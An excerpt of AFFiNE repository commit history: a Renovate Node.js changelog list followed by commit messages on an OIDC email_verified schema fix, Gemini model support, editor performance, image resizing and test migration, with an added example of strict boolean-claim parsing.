\[[`de345ea3a3`](https://redirect.github.com/nodejs/node/commit/de345ea3a3)]
- **doc**: correct description of `error.stack` accessor behavior (René)
[#&#8203;61090](https://redirect.github.com/nodejs/node/pull/61090)
-
\[[`d8418d9de7`](https://redirect.github.com/nodejs/node/commit/d8418d9de7)]
- **doc**: fix link in `--env-file=file` section (N. Bighetti)
[#&#8203;60563](https://redirect.github.com/nodejs/node/pull/60563)
-
\[[`1107bda21e`](https://redirect.github.com/nodejs/node/commit/1107bda21e)]
- **doc**: fix v22 changelog after security release (Marco Ippolito)
[#&#8203;61371](https://redirect.github.com/nodejs/node/pull/61371)
-
\[[`42aab9469a`](https://redirect.github.com/nodejs/node/commit/42aab9469a)]
- **doc**: add missing history entry for `sqlite.md` (Antoine du Hamel)
[#&#8203;60607](https://redirect.github.com/nodejs/node/pull/60607)
-
\[[`deb6d5deff`](https://redirect.github.com/nodejs/node/commit/deb6d5deff)]
- **doc, module**: change async customization hooks to experimental
(Gerhard Stöbich)
[#&#8203;60302](https://redirect.github.com/nodejs/node/pull/60302)
-
\[[`c659add7d1`](https://redirect.github.com/nodejs/node/commit/c659add7d1)]
- **doc,src,lib**: clarify experimental status of Web Storage support
(Antoine du Hamel)
[#&#8203;60708](https://redirect.github.com/nodejs/node/pull/60708)
-
\[[`dda95e91b9`](https://redirect.github.com/nodejs/node/commit/dda95e91b9)]
- **esm**: avoid throw when module specifier is not url (Craig Macomber
(Microsoft))
[#&#8203;61000](https://redirect.github.com/nodejs/node/pull/61000)
-
\[[`912945be89`](https://redirect.github.com/nodejs/node/commit/912945be89)]
- **events**: remove redundant todo (Gürgün Dayıoğlu)
[#&#8203;60595](https://redirect.github.com/nodejs/node/pull/60595)
-
\[[`22e156eb10`](https://redirect.github.com/nodejs/node/commit/22e156eb10)]
- **events**: remove eventtarget custom inspect branding (Efe)
[#&#8203;61128](https://redirect.github.com/nodejs/node/pull/61128)
-
\[[`df6fd9b03f`](https://redirect.github.com/nodejs/node/commit/df6fd9b03f)]
- **fs**: remove duplicate getValidatedPath calls (Mert Can Altin)
[#&#8203;61359](https://redirect.github.com/nodejs/node/pull/61359)
-
\[[`6ea3e4d850`](https://redirect.github.com/nodejs/node/commit/6ea3e4d850)]
- **fs**: fix errorOnExist behavior for directory copy in fs.cp
(Nicholas Paun)
[#&#8203;60946](https://redirect.github.com/nodejs/node/pull/60946)
-
\[[`dd918b9980`](https://redirect.github.com/nodejs/node/commit/dd918b9980)]
- **fs**: fix ENOTDIR in globSync when file is treated as dir (sangwook)
[#&#8203;61259](https://redirect.github.com/nodejs/node/pull/61259)
-
\[[`4908e67ba0`](https://redirect.github.com/nodejs/node/commit/4908e67ba0)]
- **fs**: remove duplicate fd validation in sync functions (Mert Can
Altin)
[#&#8203;61361](https://redirect.github.com/nodejs/node/pull/61361)
-
\[[`4a27bce3d9`](https://redirect.github.com/nodejs/node/commit/4a27bce3d9)]
- **fs**: detect dot files when using globstar (Robin van Wijngaarden)
[#&#8203;61012](https://redirect.github.com/nodejs/node/pull/61012)
-
\[[`b0186ff65c`](https://redirect.github.com/nodejs/node/commit/b0186ff65c)]
- **fs**: validate statfs path (Efe)
[#&#8203;61230](https://redirect.github.com/nodejs/node/pull/61230)
-
\[[`6689775023`](https://redirect.github.com/nodejs/node/commit/6689775023)]
- **gyp**: aix: change gcc version detection so CXX="ccache g++" works
(Stewart X Addison)
[#&#8203;61464](https://redirect.github.com/nodejs/node/pull/61464)
-
\[[`5c4f4db663`](https://redirect.github.com/nodejs/node/commit/5c4f4db663)]
- **http**: fix rawHeaders exceeding maxHeadersCount limit (Max Harari)
[#&#8203;61285](https://redirect.github.com/nodejs/node/pull/61285)
-
\[[`7599e2eccd`](https://redirect.github.com/nodejs/node/commit/7599e2eccd)]
- **http**: replace startsWith with strict equality (btea)
[#&#8203;59394](https://redirect.github.com/nodejs/node/pull/59394)
-
\[[`99a85213bf`](https://redirect.github.com/nodejs/node/commit/99a85213bf)]
- **http**: lazy allocate cookies array (Robert Nagy)
[#&#8203;59734](https://redirect.github.com/nodejs/node/pull/59734)
-
\[[`7669e6a5ad`](https://redirect.github.com/nodejs/node/commit/7669e6a5ad)]
- **http**: fix http client leaky with double response (theanarkh)
[#&#8203;60062](https://redirect.github.com/nodejs/node/pull/60062)
-
\[[`f074c126a8`](https://redirect.github.com/nodejs/node/commit/f074c126a8)]
- **http,https**: fix double ERR\_PROXY\_TUNNEL emission (Shima Ryuhei)
[#&#8203;60699](https://redirect.github.com/nodejs/node/pull/60699)
-
\[[`d8ac368363`](https://redirect.github.com/nodejs/node/commit/d8ac368363)]
- **http2**: add diagnostics channels for client stream request body
(Darshan Sen)
[#&#8203;60480](https://redirect.github.com/nodejs/node/pull/60480)
-
\[[`e26a7e464d`](https://redirect.github.com/nodejs/node/commit/e26a7e464d)]
- **http2**: rename variable to additionalPseudoHeaders (Tobias Nießen)
[#&#8203;60208](https://redirect.github.com/nodejs/node/pull/60208)
-
\[[`5df634f46e`](https://redirect.github.com/nodejs/node/commit/5df634f46e)]
- **http2**: validate initialWindowSize per HTTP/2 spec (Matteo Collina)
[#&#8203;61402](https://redirect.github.com/nodejs/node/pull/61402)
-
\[[`2ccc9a6205`](https://redirect.github.com/nodejs/node/commit/2ccc9a6205)]
- **http2**: do not crash on mismatched ping buffer length (René)
[#&#8203;60135](https://redirect.github.com/nodejs/node/pull/60135)
-
\[[`3e68a5f78a`](https://redirect.github.com/nodejs/node/commit/3e68a5f78a)]
- **inspector**: inspect HTTP response body (Chengzhong Wu)
[#&#8203;60572](https://redirect.github.com/nodejs/node/pull/60572)
-
\[[`a86ffa9a5d`](https://redirect.github.com/nodejs/node/commit/a86ffa9a5d)]
- **inspector**: add network payload buffer size limits (Chengzhong Wu)
[#&#8203;60236](https://redirect.github.com/nodejs/node/pull/60236)
-
\[[`ea60ef5d74`](https://redirect.github.com/nodejs/node/commit/ea60ef5d74)]
- **lib**: fix typo in `util.js` comment (Taejin Kim)
[#&#8203;61365](https://redirect.github.com/nodejs/node/pull/61365)
-
\[[`9d8d9322a4`](https://redirect.github.com/nodejs/node/commit/9d8d9322a4)]
- **lib**: fix TypeScript support check in jitless mode (sangwook)
[#&#8203;61382](https://redirect.github.com/nodejs/node/pull/61382)
-
\[[`fc26f5c78f`](https://redirect.github.com/nodejs/node/commit/fc26f5c78f)]
- **lib**: gbk decoder is gb18030 decoder per spec (Сковорода Никита
Андреевич)
[#&#8203;61099](https://redirect.github.com/nodejs/node/pull/61099)
-
\[[`3b87030012`](https://redirect.github.com/nodejs/node/commit/3b87030012)]
- **lib**: enforce use of `URLParse` (Antoine du Hamel)
[#&#8203;61016](https://redirect.github.com/nodejs/node/pull/61016)
-
\[[`2a7479d4fc`](https://redirect.github.com/nodejs/node/commit/2a7479d4fc)]
- **lib**: use `FastBuffer` for empty buffer allocation (Gürgün
Dayıoğlu)
[#&#8203;60558](https://redirect.github.com/nodejs/node/pull/60558)
-
\[[`7cf4c43582`](https://redirect.github.com/nodejs/node/commit/7cf4c43582)]
- **lib**: fix constructor in \_errnoException stack tree (SeokHun)
[#&#8203;60156](https://redirect.github.com/nodejs/node/pull/60156)
-
\[[`f9d87fbfaa`](https://redirect.github.com/nodejs/node/commit/f9d87fbfaa)]
- **lib**: fix typo in QuicSessionStats (SeokHun)
[#&#8203;60155](https://redirect.github.com/nodejs/node/pull/60155)
-
\[[`8d26ccc652`](https://redirect.github.com/nodejs/node/commit/8d26ccc652)]
- **lib**: remove redundant destroyHook checks (Gürgün Dayıoğlu)
[#&#8203;60120](https://redirect.github.com/nodejs/node/pull/60120)
-
\[[`705832a1be`](https://redirect.github.com/nodejs/node/commit/705832a1be)]
- **lib,src**: isInsideNodeModules should test on the first non-internal
frame (Chengzhong Wu)
[#&#8203;60991](https://redirect.github.com/nodejs/node/pull/60991)
-
\[[`6f39ad190b`](https://redirect.github.com/nodejs/node/commit/6f39ad190b)]
- **meta**: do not fast-track npm updates (Antoine du Hamel)
[#&#8203;61475](https://redirect.github.com/nodejs/node/pull/61475)
-
\[[`a6a0ff9486`](https://redirect.github.com/nodejs/node/commit/a6a0ff9486)]
- **meta**: fix typos in issue template config (Daijiro Wachi)
[#&#8203;61399](https://redirect.github.com/nodejs/node/pull/61399)
-
\[[`ec88c9b378`](https://redirect.github.com/nodejs/node/commit/ec88c9b378)]
- **meta**: label v8 module PRs (René)
[#&#8203;61325](https://redirect.github.com/nodejs/node/pull/61325)
-
\[[`83143835de`](https://redirect.github.com/nodejs/node/commit/83143835de)]
- **meta**: bump step-security/harden-runner from 2.13.2 to 2.14.0
(dependabot\[bot])
[#&#8203;61245](https://redirect.github.com/nodejs/node/pull/61245)
-
\[[`0802dc663a`](https://redirect.github.com/nodejs/node/commit/0802dc663a)]
- **meta**: bump actions/setup-node from 6.0.0 to 6.1.0
(dependabot\[bot])
[#&#8203;61244](https://redirect.github.com/nodejs/node/pull/61244)
-
\[[`587db55796`](https://redirect.github.com/nodejs/node/commit/587db55796)]
- **meta**: bump actions/cache from 4.3.0 to 5.0.1 (dependabot\[bot])
[#&#8203;61243](https://redirect.github.com/nodejs/node/pull/61243)
-
\[[`262c9d37a6`](https://redirect.github.com/nodejs/node/commit/262c9d37a6)]
- **meta**: bump github/codeql-action from 4.31.6 to 4.31.9
(dependabot\[bot])
[#&#8203;61241](https://redirect.github.com/nodejs/node/pull/61241)
-
\[[`d9763b5afd`](https://redirect.github.com/nodejs/node/commit/d9763b5afd)]
- **meta**: bump codecov/codecov-action from 5.5.1 to 5.5.2
(dependabot\[bot])
[#&#8203;61240](https://redirect.github.com/nodejs/node/pull/61240)
-
\[[`0af73d1811`](https://redirect.github.com/nodejs/node/commit/0af73d1811)]
- **meta**: bump peter-evans/create-pull-request from 7.0.9 to 8.0.0
(dependabot\[bot])
[#&#8203;61237](https://redirect.github.com/nodejs/node/pull/61237)
-
\[[`8be6afd239`](https://redirect.github.com/nodejs/node/commit/8be6afd239)]
- **meta**: move lukekarrys to emeritus (Node.js GitHub Bot)
[#&#8203;60985](https://redirect.github.com/nodejs/node/pull/60985)
-
\[[`c497de5c74`](https://redirect.github.com/nodejs/node/commit/c497de5c74)]
- **meta**: bump actions/setup-python from 6.0.0 to 6.1.0
(dependabot\[bot])
[#&#8203;60927](https://redirect.github.com/nodejs/node/pull/60927)
-
\[[`774920f169`](https://redirect.github.com/nodejs/node/commit/774920f169)]
- **meta**: bump github/codeql-action from 4.31.3 to 4.31.6
(dependabot\[bot])
[#&#8203;60926](https://redirect.github.com/nodejs/node/pull/60926)
-
\[[`ef3b1e5991`](https://redirect.github.com/nodejs/node/commit/ef3b1e5991)]
- **meta**: bump peter-evans/create-pull-request from 7.0.8 to 7.0.9
(dependabot\[bot])
[#&#8203;60924](https://redirect.github.com/nodejs/node/pull/60924)
-
\[[`3ed667379f`](https://redirect.github.com/nodejs/node/commit/3ed667379f)]
- **meta**: bump github/codeql-action from 4.31.2 to 4.31.3
(dependabot\[bot])
[#&#8203;60770](https://redirect.github.com/nodejs/node/pull/60770)
-
\[[`7c0cefb126`](https://redirect.github.com/nodejs/node/commit/7c0cefb126)]
- **meta**: bump step-security/harden-runner from 2.13.1 to 2.13.2
(dependabot\[bot])
[#&#8203;60769](https://redirect.github.com/nodejs/node/pull/60769)
-
\[[`5c6a076e5d`](https://redirect.github.com/nodejs/node/commit/5c6a076e5d)]
- **meta**: add Renegade334 to collaborators (Renegade334)
[#&#8203;60714](https://redirect.github.com/nodejs/node/pull/60714)
-
\[[`4f4dda2a18`](https://redirect.github.com/nodejs/node/commit/4f4dda2a18)]
- **meta**: bump actions/download-artifact from 5.0.0 to 6.0.0
(dependabot\[bot])
[#&#8203;60532](https://redirect.github.com/nodejs/node/pull/60532)
-
\[[`c436f8d57c`](https://redirect.github.com/nodejs/node/commit/c436f8d57c)]
- **meta**: bump actions/upload-artifact from 4.6.2 to 5.0.0
(dependabot\[bot])
[#&#8203;60531](https://redirect.github.com/nodejs/node/pull/60531)
-
\[[`402d9f87a6`](https://redirect.github.com/nodejs/node/commit/402d9f87a6)]
- **meta**: bump github/codeql-action from 3.30.5 to 4.31.2
(dependabot\[bot])
[#&#8203;60533](https://redirect.github.com/nodejs/node/pull/60533)
-
\[[`61be78e326`](https://redirect.github.com/nodejs/node/commit/61be78e326)]
- **meta**: bump actions/setup-node from 5.0.0 to 6.0.0
(dependabot\[bot])
[#&#8203;60529](https://redirect.github.com/nodejs/node/pull/60529)
-
\[[`7e4164a623`](https://redirect.github.com/nodejs/node/commit/7e4164a623)]
- **meta**: bump actions/stale from 10.0.0 to 10.1.0 (dependabot\[bot])
[#&#8203;60528](https://redirect.github.com/nodejs/node/pull/60528)
-
\[[`1bf6e1d010`](https://redirect.github.com/nodejs/node/commit/1bf6e1d010)]
- **meta**: move one or more collaborators to emeritus (Node.js GitHub
Bot) [#60325](https://redirect.github.com/nodejs/node/pull/60325)
- \[[`c66fc0e9cf`](https://redirect.github.com/nodejs/node/commit/c66fc0e9cf)] - **meta**: loop userland-migrations in deprecations (Chengzhong Wu) [#60299](https://redirect.github.com/nodejs/node/pull/60299)
- \[[`e4be0791e7`](https://redirect.github.com/nodejs/node/commit/e4be0791e7)] - **meta**: call `create-release-post.yml` post release (Aviv Keller) [#60366](https://redirect.github.com/nodejs/node/pull/60366)
- \[[`8674f6527f`](https://redirect.github.com/nodejs/node/commit/8674f6527f)] - **module**: preserve URL in the parent created by createRequire() (Joyee Cheung) [#60974](https://redirect.github.com/nodejs/node/pull/60974)
- \[[`41db87a975`](https://redirect.github.com/nodejs/node/commit/41db87a975)] - **msi**: fix WiX warnings (Stefan Stojanovic) [#60251](https://redirect.github.com/nodejs/node/pull/60251)
- \[[`884f313f40`](https://redirect.github.com/nodejs/node/commit/884f313f40)] - **node-api**: use Node-API in comments (Vladimir Morozov) [#61320](https://redirect.github.com/nodejs/node/pull/61320)
- \[[`375164190b`](https://redirect.github.com/nodejs/node/commit/375164190b)] - **node-api**: use local files for instanceof test (Vladimir Morozov) [#60190](https://redirect.github.com/nodejs/node/pull/60190)
- \[[`972a1107c0`](https://redirect.github.com/nodejs/node/commit/972a1107c0)] - **os**: freeze signals constant (Xavier Stouder) [#61038](https://redirect.github.com/nodejs/node/pull/61038)
- \[[`e992057ab7`](https://redirect.github.com/nodejs/node/commit/e992057ab7)] - **perf\_hooks**: fix stack overflow error (Antoine du Hamel) [#60084](https://redirect.github.com/nodejs/node/pull/60084)
- \[[`0bb1814fdf`](https://redirect.github.com/nodejs/node/commit/0bb1814fdf)] - **repl**: fix pasting after moving the cursor to the left (Ruben Bridgewater) [#60470](https://redirect.github.com/nodejs/node/pull/60470)
- \[[`35a12fb996`](https://redirect.github.com/nodejs/node/commit/35a12fb996)] - **src**: replace `ranges::sort` for libc++13 compatibility on armhf (Rebroad) [#61789](https://redirect.github.com/nodejs/node/pull/61789)
- \[[`dbf00d4664`](https://redirect.github.com/nodejs/node/commit/dbf00d4664)] - **src**: add missing override specifier to Clean() (Tobias Nießen) [#61429](https://redirect.github.com/nodejs/node/pull/61429)
- \[[`140eba35d3`](https://redirect.github.com/nodejs/node/commit/140eba35d3)] - **src**: cache context lookup in vectored io loops (Mert Can Altin) [#61387](https://redirect.github.com/nodejs/node/pull/61387)
- \[[`93e7e1708b`](https://redirect.github.com/nodejs/node/commit/93e7e1708b)] - **src**: use C++ nullptr in webstorage (Tobias Nießen) [#61407](https://redirect.github.com/nodejs/node/pull/61407)
- \[[`ef868447bc`](https://redirect.github.com/nodejs/node/commit/ef868447bc)] - **src**: fix pointer alignment (jhofstee) [#61336](https://redirect.github.com/nodejs/node/pull/61336)
- \[[`a96256524c`](https://redirect.github.com/nodejs/node/commit/a96256524c)] - **src**: dump snapshot source with node:generate\_default\_snapshot\_source (Joyee Cheung) [#61101](https://redirect.github.com/nodejs/node/pull/61101)
- \[[`ec051b9efd`](https://redirect.github.com/nodejs/node/commit/ec051b9efd)] - **src**: add HandleScope to edge loop in heap\_utils (Mert Can Altin) [#60885](https://redirect.github.com/nodejs/node/pull/60885)
- \[[`41749eb5d6`](https://redirect.github.com/nodejs/node/commit/41749eb5d6)] - **src**: remove redundant CHECK (Tobias Nießen) [#61130](https://redirect.github.com/nodejs/node/pull/61130)
- \[[`57c81e5af3`](https://redirect.github.com/nodejs/node/commit/57c81e5af3)] - **src**: fix off-thread cert loading in bundled cert mode (Joyee Cheung) [#60764](https://redirect.github.com/nodejs/node/pull/60764)
- \[[`4b0616e024`](https://redirect.github.com/nodejs/node/commit/4b0616e024)] - **src**: handle DER decoding errors from system certificates (Joyee Cheung) [#60787](https://redirect.github.com/nodejs/node/pull/60787)
- \[[`93393371f9`](https://redirect.github.com/nodejs/node/commit/93393371f9)] - **src**: use static\_cast instead of C-style cast (Michaël Zasso) [#60868](https://redirect.github.com/nodejs/node/pull/60868)
- \[[`900445b655`](https://redirect.github.com/nodejs/node/commit/900445b655)] - **src**: move Node-API version detection to where it is used (Anna Henningsen) [#60512](https://redirect.github.com/nodejs/node/pull/60512)
- \[[`8353a6da2a`](https://redirect.github.com/nodejs/node/commit/8353a6da2a)] - **src**: avoid C strings in more C++ exception throws (Anna Henningsen) [#60592](https://redirect.github.com/nodejs/node/pull/60592)
- \[[`27c860c51f`](https://redirect.github.com/nodejs/node/commit/27c860c51f)] - **src**: move `napi_addon_register_func` to `node_api_types.h` (Anna Henningsen) [#60512](https://redirect.github.com/nodejs/node/pull/60512)
- \[[`e0517752e7`](https://redirect.github.com/nodejs/node/commit/e0517752e7)] - **src**: remove unconditional NAPI\_EXPERIMENTAL in node.h (Chengzhong Wu) [#60345](https://redirect.github.com/nodejs/node/pull/60345)
- \[[`21e2a52f8e`](https://redirect.github.com/nodejs/node/commit/21e2a52f8e)] - **src**: clean up generic counter implementation (Anna Henningsen) [#60447](https://redirect.github.com/nodejs/node/pull/60447)
- \[[`aed23cb8ca`](https://redirect.github.com/nodejs/node/commit/aed23cb8ca)] - **src**: add enum handle for ToStringHelper + formatting (Burkov Egor) [#56829](https://redirect.github.com/nodejs/node/pull/56829)
- \[[`2e93650ebc`](https://redirect.github.com/nodejs/node/commit/2e93650ebc)] - **src**: fix timing of snapshot serialize callback (Joyee Cheung) [#60434](https://redirect.github.com/nodejs/node/pull/60434)
- \[[`ece4acc18f`](https://redirect.github.com/nodejs/node/commit/ece4acc18f)] - **src**: add COUNT\_GENERIC\_USAGE utility for tests (Joyee Cheung) [#60434](https://redirect.github.com/nodejs/node/pull/60434)
- \[[`31c8e9d9ff`](https://redirect.github.com/nodejs/node/commit/31c8e9d9ff)] - **src**: use cached primordials\_string (Sohyeon Kim) [#60255](https://redirect.github.com/nodejs/node/pull/60255)
- \[[`7f0ffddc14`](https://redirect.github.com/nodejs/node/commit/7f0ffddc14)] - **src**: implement Windows-1252 encoding support and update related tests (Mert Can Altin) [#60893](https://redirect.github.com/nodejs/node/pull/60893)
- \[[`c2ba56d6b2`](https://redirect.github.com/nodejs/node/commit/c2ba56d6b2)] - **src,permission**: fix permission.has on empty param (Rafael Gonzaga) [#60674](https://redirect.github.com/nodejs/node/pull/60674)
- \[[`e55a2b895a`](https://redirect.github.com/nodejs/node/commit/e55a2b895a)] - **src,permission**: add debug log on is\_tree\_granted (Rafael Gonzaga) [#60668](https://redirect.github.com/nodejs/node/pull/60668)
- \[[`902a78b43c`](https://redirect.github.com/nodejs/node/commit/902a78b43c)] - **stream**: fix isErrored/isWritable for WritableStreams (René) [#60905](https://redirect.github.com/nodejs/node/pull/60905)
- \[[`221b77cf41`](https://redirect.github.com/nodejs/node/commit/221b77cf41)] - **stream**: don't try to read more if reading (Robert Nagy) [#60454](https://redirect.github.com/nodejs/node/pull/60454)
- \[[`46d12d826f`](https://redirect.github.com/nodejs/node/commit/46d12d826f)] - **test**: skip strace test with shared openssl (Richard Lau) [#61987](https://redirect.github.com/nodejs/node/pull/61987)
- \[[`52e6b01a44`](https://redirect.github.com/nodejs/node/commit/52e6b01a44)] - **test**: mark `test-strace-openat-openssl` as flaky (Antoine du Hamel) [#61921](https://redirect.github.com/nodejs/node/pull/61921)
- \[[`4d7468d0e0`](https://redirect.github.com/nodejs/node/commit/4d7468d0e0)] - **test**: skip --build-sea tests on platforms where SEA is flaky (Joyee Cheung) [#61504](https://redirect.github.com/nodejs/node/pull/61504)
- \[[`f604b7ae67`](https://redirect.github.com/nodejs/node/commit/f604b7ae67)] - **test**: fix flaky debugger test (Ryuhei Shima) [#58324](https://redirect.github.com/nodejs/node/pull/58324)
- \[[`fc2dc4024b`](https://redirect.github.com/nodejs/node/commit/fc2dc4024b)] - **test**: ensure removeListener event fires for once() listeners (sangwook) [#60137](https://redirect.github.com/nodejs/node/pull/60137)
- \[[`5fba382816`](https://redirect.github.com/nodejs/node/commit/5fba382816)] - **test**: delay writing the files only on macOS (Luigi Pinca) [#61532](https://redirect.github.com/nodejs/node/pull/61532)
- \[[`85cc9e20e4`](https://red

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-09 18:16:47 +08:00
Kenneth Wußmann 0b47f92134 fix(oidc): allow string boolean in email_verified userinfo schema (#14609)
## Why

When using AWS Cognito as OIDC provider, AFFiNE returns a zod parsing
error because AWS returns `email_verified` as a string in the userinfo
response.

```json
{
    "sub": "[UUID]",
    "email_verified": "true",
    "custom:mycustom1": "CustomValue",
    "phone_number_verified": "true",
    "phone_number": "+12065551212",
    "email": "bob@example.com",
    "username": "bob"
}
```

Reference:
https://docs.aws.amazon.com/cognito/latest/developerguide/userinfo-endpoint.html#get-userinfo-response-sample

Error returned in AFFiNE frontend:
```
Validation error, errors: [ { "code": "invalid_type", "expected": "boolean", "received": "string", "path": [ "email_verified" ], "message": "Expected boolean, received string" } ]
```

## What

I'm adjusting the existing `OIDCUserInfoSchema` to allow `z.boolean()`
and `z.enum(['true', 'false', '0', '1', 'yes', 'no'])`.
This matches with [our `extractBoolean` function in the
`OIDCProvider`](https://github.com/KennethWussmann/AFFiNE/blob/82e6239957db5f3754cde8ad968db62bc4ffad6a/packages/backend/server/src/plugins/oauth/providers/oidc.ts#L269-L285),
which already parses string as booleans in `email_verified`. But because
the userinfo response is parsed with zod first, it's failing before
reaching our `extractBoolean`.

> [!NOTE]
> We are using zod v3. In zod v4 they [added support for
`z.stringbool()`](https://zod.dev/api?id=stringbool) which would make
this easier.


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

## Release Notes

* **Bug Fixes**
* Enhanced OpenID Connect provider authentication to accept flexible
formats for email verification status, including various string
representations alongside boolean values.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-09 02:53:43 +00:00
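The rule this commit message describes for `email_verified`, as an added example rather than AFFiNE's own code: a dependency-free TypeScript model (no zod) that accepts a boolean or one of the six listed strings and rejects every other shape, next to the truthiness coercion it must not be confused with. The function names, the string-to-boolean mapping, the fail-closed handling of a missing claim and the `constructed-*` samples are assumptions.

```typescript
// Added example (not AFFiNE's code): models the accepted shapes of the
// OIDC userinfo claim `email_verified` described in the commit message.

interface EmailVerifiedResult {
  ok: boolean;        // false when the claim has a shape the rule rejects
  verified: boolean;  // only meaningful when ok is true
  error?: string;
}

// The six string spellings listed in the commit message. Which spelling maps
// to which boolean is an assumption made for this example.
const STRING_FORMS: Record<string, boolean> = {
  'true': true, '1': true, 'yes': true,
  'false': false, '0': false, 'no': false,
};

// Pitfall: truthiness coercion treats every non-empty string as true, so the
// string "false" would mark an unverified address as verified.
function naiveEmailVerified(userinfo: Record<string, unknown>): boolean {
  return Boolean(userinfo['email_verified']);
}

// Strict parse: boolean, or an exact (case-sensitive) match on a listed string.
function parseEmailVerified(userinfo: Record<string, unknown>): EmailVerifiedResult {
  const raw = userinfo['email_verified'];
  if (raw === undefined) {
    // Assumption: an absent claim is treated as "not verified" (fail closed).
    return { ok: true, verified: false };
  }
  if (typeof raw === 'boolean') {
    return { ok: true, verified: raw };
  }
  // Own-property lookup so inherited keys such as "constructor" never match.
  if (typeof raw === 'string' &&
      Object.prototype.hasOwnProperty.call(STRING_FORMS, raw)) {
    return { ok: true, verified: STRING_FORMS[raw] === true };
  }
  return {
    ok: false,
    verified: false,
    error: 'email_verified: expected boolean or one of true/false/0/1/yes/no, ' +
           'received ' + typeof raw,
  };
}

// Sample userinfo bodies. The first is the Cognito sample quoted in the commit
// message; the others are constructed for this example.
const SAMPLES: string[] = [
  '{"sub":"[UUID]","email_verified":"true","custom:mycustom1":"CustomValue",' +
    '"phone_number_verified":"true","phone_number":"+12065551212",' +
    '"email":"bob@example.com","username":"bob"}',
  '{"sub":"constructed-1","email_verified":"false","email":"eve@example.com"}',
  '{"sub":"constructed-2","email_verified":"TRUE","email":"eve@example.com"}',
  '{"sub":"constructed-3","email_verified":1,"email":"eve@example.com"}',
  '{"sub":"constructed-4","email":"eve@example.com"}',
];

// One summary line per sample, comparing the strict parse with naive coercion.
function runSamples(): string[] {
  return SAMPLES.map(function (body: string): string {
    const userinfo = JSON.parse(body) as Record<string, unknown>;
    const strict = parseEmailVerified(userinfo);
    const outcome = strict.ok ? 'verified=' + strict.verified : 'rejected';
    return String(userinfo['sub']) + ': strict ' + outcome +
      ', naive verified=' + naiveEmailVerified(userinfo);
  });
}

console.log(runSamples().join('\n'));
```

The `constructed-1` row is the one to watch: the strict parse reports the address as unverified while truthiness coercion reports it as verified.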
DarkSky 9c55edeb62 feat(server): adapt gemini3.1 preview (#14583)
#### PR Dependency Tree


* **PR #14583** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Added Gemini 3.1 Pro Preview support (text, image, audio) and new
GPT‑5 variants as defaults; centralized persistent telemetry state for
more reliable client identity.

* **UX**
  * Improved model submenu placement in chat preferences.
* More robust mindmap parsing, preview, regeneration and replace
behavior.

* **Chores**
  * Bumped AI SDK and related dependencies.

* **Tests**
  * Expanded/updated tests and increased timeouts for flaky flows.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-08 00:53:16 +08:00
DarkSky 9742e9735e feat(editor): improve edgeless perf & memory usage (#14591)
#### PR Dependency Tree


* **PR #14591** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* New canvas renderer debug metrics and controls for runtime inspection.
* Mindmap/group reordering now normalizes group targets, improving
reorder consistency.

* **Bug Fixes**
  * Fixed connector behavior for empty/degenerate paths.
* More aggressive viewport invalidation so structural changes display
correctly.
* Improved z-index synchronization during transforms and layer updates.

* **Performance**
* Retained DOM caching for brushes, shapes, and connectors to reduce DOM
churn.
* Targeted canvas refreshes, pooling, and reuse to lower redraw and
memory overhead.

* **Tests**
* Added canvas renderer performance benchmarks and curve edge-case unit
tests.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-07 09:12:14 +08:00
DarkSky 86d65b2f64 feat(server): add image resize support (#14588)
fix #13842 


#### PR Dependency Tree


* **PR #14588** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Images are now processed natively and converted to WebP for smaller,
optimized files; Copilot and avatar attachments use the processed WebP
output.
* Avatar uploads accept BMP, GIF, JPEG, PNG, WebP (5MB max) and are
downscaled to a standard edge.

* **Error Messages / i18n**
  * Added localized error "Image format not supported: {format}".

* **Tests**
* Added end-to-end and unit tests for conversion, EXIF preservation, and
upload limits.

* **Chores**
  * Added native image-processing dependencies.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-07 04:42:12 +08:00
DarkSky f34e25e122 test: migrate test & utils (#14569)
#### PR Dependency Tree


* **PR #14569** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Upgraded development test tooling to Vitest v4 and added Playwright
browser test integration; normalized test configurations and CI shard
matrix.

* **Tests**
* Added a large suite of new integration tests covering editor flows
(edgeless, database, embeds, images, latex, code, clipboard,
multi-editor, presentation, undo/redo, etc.).
* Removed numerous end-to-end Playwright test suites across the same
feature areas.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-07 04:12:27 +08:00
DarkSky b5d5b71f95 feat(server): improve markdown parse (#14580)
#### PR Dependency Tree


* **PR #14580** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Markdown conversion now reports lists of known-unsupported and unknown
block identifiers encountered during parsing, and separates them from
the main markdown output.

* **Bug Fixes**
  * Improved error handling and logging around markdown parsing.

* **Tests**
* Updated tests and snapshots to reflect the new block-list fields and
the adjusted markdown output.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-07 00:14:27 +08:00
renovate[bot] 09fa1a8e4e chore: bump up dompurify version to v3.3.2 [SECURITY] (#14581)
